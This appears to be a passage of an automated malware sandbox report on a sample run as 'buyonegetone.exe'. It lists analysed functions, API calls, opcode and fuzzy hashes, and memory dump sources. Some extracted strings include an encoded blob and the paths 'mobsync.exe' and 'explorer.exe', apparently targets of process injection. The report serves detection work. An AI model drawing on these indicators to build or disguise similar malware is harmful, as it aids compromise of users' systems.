                                                                                                                                                                      • String ID: exp
                                                                                                                                                                      • API String ID: 1187470696-113136155
                                                                                                                                                                      • Opcode ID: 38fead14972a1eec31403cf24fe4bb4e0cf0cf9b1638df4f6de8ca42ef05cc45
                                                                                                                                                                      • Instruction ID: 62d796595d9cb9be67288dfb7478ddb45a4d819f751e04cc70375c3ac003c06b
                                                                                                                                                                      • Opcode Fuzzy Hash: 38fead14972a1eec31403cf24fe4bb4e0cf0cf9b1638df4f6de8ca42ef05cc45
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F213E32E19685CBD764DF69A44016ABAA4FBE9340F605135F69DC2B85FF3CE4008F04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11EC8C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompareStringtry_get_function
                                                                                                                                                                      • String ID: CompareStringEx
                                                                                                                                                                      • API String ID: 3328479835-2590796910
                                                                                                                                                                      • Opcode ID: 7151cf555841e62792745c7ee48492f6c8567249aac293e9bf01437dc0ad6030
                                                                                                                                                                      • Instruction ID: ceb2ffce5abcaf420c9da68fdd555838bc68d99e57317ea63a3656f14d78facb
                                                                                                                                                                      • Opcode Fuzzy Hash: 7151cf555841e62792745c7ee48492f6c8567249aac293e9bf01437dc0ad6030
                                                                                                                                                                      • Instruction Fuzzy Hash: 95110E36A0CBC186D760CB56B4402AABBA4FBE9B90F144135FE9D83B99DF3CD4448B44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11F140, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                                                                      • Opcode ID: 871af9d8ab282d3569e3073f6cd61f7e70fb74fcc2ea2c3338b270036ff96911
                                                                                                                                                                      • Instruction ID: 63149cc9baa7bda583b9ae2f3bbfdad159e8d83e16932432ed1c0c47595154a7
                                                                                                                                                                      • Opcode Fuzzy Hash: 871af9d8ab282d3569e3073f6cd61f7e70fb74fcc2ea2c3338b270036ff96911
                                                                                                                                                                      • Instruction Fuzzy Hash: 05113E36A08B8186D760CB46F4402AABBA4FBE9B90F144135FE9D93B59DF3CD4408B44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE1028A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 1838369231-1405518554
                                                                                                                                                                      • Opcode ID: 8dfaff509c755597ec061ef6071315be3bb42e56ada5acf187447b46f720058e
                                                                                                                                                                      • Instruction ID: b1795ce296768dd6802e66cb9f05e416b51206efdfeedf4726d03cf82a76a78e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8dfaff509c755597ec061ef6071315be3bb42e56ada5acf187447b46f720058e
                                                                                                                                                                      • Instruction Fuzzy Hash: B0016262509B8189C744DF75A88015D7BA5FBA8B847186539DBACC375AEF38C4A0C344
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10BB14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6FE1085BE), ref: 00007FF6FE10BB58
                                                                                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6FE1085BE), ref: 00007FF6FE10BB9E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                      • Opcode ID: bea819e4984341876aae97c79fcd7bc68fbabd3abac3cc71b665084c62774502
                                                                                                                                                                      • Instruction ID: c8ce303fbad607acb2ea1e9528e09abdd107a69faa1eceae1494b0e38a28fe1a
                                                                                                                                                                      • Opcode Fuzzy Hash: bea819e4984341876aae97c79fcd7bc68fbabd3abac3cc71b665084c62774502
                                                                                                                                                                      • Instruction Fuzzy Hash: 64114F32A18B4582EB20CF16E4402697BA0FBD8B84F584230EF9D47798EF3CD951C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11EFB0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultUsertry_get_function
                                                                                                                                                                      • String ID: GetUserDefaultLocaleName
                                                                                                                                                                      • API String ID: 3217810228-151340334
                                                                                                                                                                      • Opcode ID: f36847d21b47396b6124b8caf12b7d888d3aeb93c0b5cdd0a56f9e98f48143d9
                                                                                                                                                                      • Instruction ID: 3014a04f5f74497ddb975567c8d99a75b5eb1a2c468b3677c688073459f4aa65
                                                                                                                                                                      • Opcode Fuzzy Hash: f36847d21b47396b6124b8caf12b7d888d3aeb93c0b5cdd0a56f9e98f48143d9
                                                                                                                                                                      • Instruction Fuzzy Hash: 83F08211F1854391FB14DB97B9826BD5A52AFF87C0F444035F93D866D5FE2CA449C341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11F014, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F045
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF6FE11496C,?,?,?,?,?,?,?,?,00007FF6FE112177), ref: 00007FF6FE11F05F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                                                                      • Opcode ID: 2cbb35288a37513c5ba61f5b238e96a2c6ce937cdb013f21624f9d819ca3875d
                                                                                                                                                                      • Instruction ID: 6a24dbfacd646163d121ac0b690d1760d8930d45cbd6178617ce9f9821ad6df4
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cbb35288a37513c5ba61f5b238e96a2c6ce937cdb013f21624f9d819ca3875d
                                                                                                                                                                      • Instruction Fuzzy Hash: 70F0B421E08641C1F704DB83B8000A92A61BFE8780F444039FA7D837D5EE3CE485C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11EED8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11EF01
                                                                                                                                                                      • TlsSetValue.KERNEL32(?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D,?,?,?,?,00007FF6FE11AE29), ref: 00007FF6FE11EF18
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                                                                      • String ID: FlsSetValue
                                                                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                                                                      • Opcode ID: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction ID: 02635ee799c8678495d495d43cdf7b766698083974c1f7d37368c3f1f825e9db
                                                                                                                                                                      • Opcode Fuzzy Hash: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction Fuzzy Hash: B5E06561E1854795FB04CB96FC410B96A61AFF9780F884035F93D863D5EE3CE485C340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Analysis Process: buyonegetone.exe PID: 4244 Parent PID: 3388 buyonegetone.exeCOMMON

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FF7E3D75ED8, Relevance: 3.2, APIs: 2, Instructions: 207COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Wcsftime$_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4239037671-0
                                                                                                                                                                      • Opcode ID: b7cdc139778069345d05bc1a0203156a00a62fb54fc34efc2fb8fe5e1c560dcb
                                                                                                                                                                      • Instruction ID: 7ce52e786e12d39dab642d4892a3c8934f6442b7883980e2422f9b26f35470ca
                                                                                                                                                                      • Opcode Fuzzy Hash: b7cdc139778069345d05bc1a0203156a00a62fb54fc34efc2fb8fe5e1c560dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: F1810572B04A0182EBA0EFA5C08537DAB61FB44B99F804637EE5EA7785DF38D041C311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D67CB8, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      • Opcode ID: 088d467cec947a303d1071b944324c29810d5aa90d0137deb7dd50eed9953ca4
                                                                                                                                                                      • Instruction ID: 623670d79a889d3c36aae35934626c391705c2aba0e9a4a0cc5937caf5f8394f
                                                                                                                                                                      • Opcode Fuzzy Hash: 088d467cec947a303d1071b944324c29810d5aa90d0137deb7dd50eed9953ca4
                                                                                                                                                                      • Instruction Fuzzy Hash: ACE0E620E5D543C6E99AF7E548423BC9D905F49321FD0413BE22D713C2CD3C25625A73
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D63190, Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 341COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • explorer.exe, xrefs: 00007FF7E3D62F76
                                                                                                                                                                      • @, xrefs: 00007FF7E3D63096
                                                                                                                                                                      • FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj, xrefs: 00007FF7E3D63240
                                                                                                                                                                      • R]7, xrefs: 00007FF7E3D633CB
                                                                                                                                                                      • C:\Windows\System32\mobsync.exe, xrefs: 00007FF7E3D6303C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Window$Concurrency::cancel_current_taskConsoleMitigationPolicyProcessShow
                                                                                                                                                                      • String ID: @$C:\Windows\System32\mobsync.exe$FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj$R]7$explorer.exe
                                                                                                                                                                      • API String ID: 4262344479-4185684469
                                                                                                                                                                      • Opcode ID: a468b3e6b28607d6e2ec463ba5eb1e3f63ae2e4094c7e7b9fc94da40cd4cfa08
                                                                                                                                                                      • Instruction ID: ac19a3cb6387c2639ee42f58477c7aad2940453db622b449d287124bf452df38
                                                                                                                                                                      • Opcode Fuzzy Hash: a468b3e6b28607d6e2ec463ba5eb1e3f63ae2e4094c7e7b9fc94da40cd4cfa08
                                                                                                                                                                      • Instruction Fuzzy Hash: 52E1F232A18B8585EB50DFA4D4443ADBB61FB45794F904236DAAD17BE9CF3CE080C751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D65DE0, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 340COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID: [!] PAUSE$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 2081738530-3229271104
                                                                                                                                                                      • Opcode ID: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction ID: ecb931074730393de39d22af678fdcc01959d80aaa59609b9809870c2b645797
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b47cfc8a2ab3d0877d47af7543c7d0808fcd3ae3f20c1146f8bb5cf32415501
                                                                                                                                                                      • Instruction Fuzzy Hash: 20E19E72608E4182EBA0EF95E440379ABA1FB84F94F998533DA6E937A5CF3DD441C311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D62A20, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                                                                                      • Opcode ID: 00c924be77ec5e6de29e7d77c401772db9bcaf2481e1327176cac6107a81c22f
                                                                                                                                                                      • Instruction ID: a6da00fd217ffaefac954e7e7332b453afce0bc35d43d80c12cfb64eb757e8bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 00c924be77ec5e6de29e7d77c401772db9bcaf2481e1327176cac6107a81c22f
                                                                                                                                                                      • Instruction Fuzzy Hash: C2419B22B09B4189EB91EFA4D4503BCBBB4EF44748F84447ADE4D32A99DE38D5169322
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D67CD4, Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3638128798-0
                                                                                                                                                                      • Opcode ID: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction ID: 464c675ee1218c6d5c02570fac2af139b372227e053dde65525fb290553b7713
                                                                                                                                                                      • Opcode Fuzzy Hash: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B315E21E0CA4781EAD4FBE194113B9DA91AF41790FC44437E62E273D3CE7EA8458233
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D72060, Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction ID: 4e03b0d6a3665f4c67e082645c90d057ecc664176a86eb4c3e7a60ae869e753b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction Fuzzy Hash: 00E01A20A0424182EA94FBB09895379AA62AF84742F90543AC84E17392CD7EB4698332
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7EC00, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                      • API String ID: 2742660187-2031265017
                                                                                                                                                                      • Opcode ID: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction ID: 93d25a6376ddb7dc1dfc1dfea445675dfa850de24fbd032c070bfd66a777a60c
                                                                                                                                                                      • Opcode Fuzzy Hash: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction Fuzzy Hash: 75E04851E0450691FB44EBD9B4443B09715EF58370EC80333EA3C2A3E09E7CA9958311
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D662A0, Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 73155330-0
                                                                                                                                                                      • Opcode ID: f19c406f68e5b55e61e82716ca93a81777c36e173ab4f025d0dcb92144516b81
                                                                                                                                                                      • Instruction ID: d4282b3172a29f09918777de2900f8f882562f8ff551f2db647e2e202c28682e
